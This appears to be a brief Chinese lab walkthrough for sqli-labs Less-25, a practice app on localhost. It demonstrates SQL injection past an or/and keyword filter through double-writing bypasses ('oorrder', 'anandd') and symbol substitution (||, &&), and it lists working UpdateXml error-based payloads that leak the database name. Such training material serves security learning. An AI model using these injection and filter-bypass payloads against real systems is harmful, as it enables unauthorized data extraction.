加单引号
order by一下
http://localhost/sqli-labs-master/Less-25/?id=1‘ order by 1%23
order by 变成了der by
下面的hint也显示了过滤后的字符串,其实直接看报错就可以看出来了,虽然标题是屏蔽了or和and,结果order也被误伤了
由于过滤只是单纯的将or and用空串进行了替换那么构造oorrder by就应该可以通过了
http://localhost/sqli-labs-master/Less-25/?id=1‘ oorrder by 1%23
union select完全没有过滤
and绕过
http://localhost/sqli-labs-master/Less-25/?id=1‘ anandd UpdateXml(1,concat(0x7e,database(),0x7e),1)%23
上面的绕过方式被称为双写绕过,除此之外,还可以用符号绕过
符号 URL编码
or || %7c%7c
and && %26%26(GET提交必须编码)
http://localhost/sqli-labs-master/Less-25/?id=0‘ || UpdateXml(1,concat(0x7e,database(),0x7e),1)%23
http://localhost/sqli-labs-master/Less-25/?id=1‘ %26%26 UpdateXml(1,concat(0x7e,database(),0x7e),1)%23
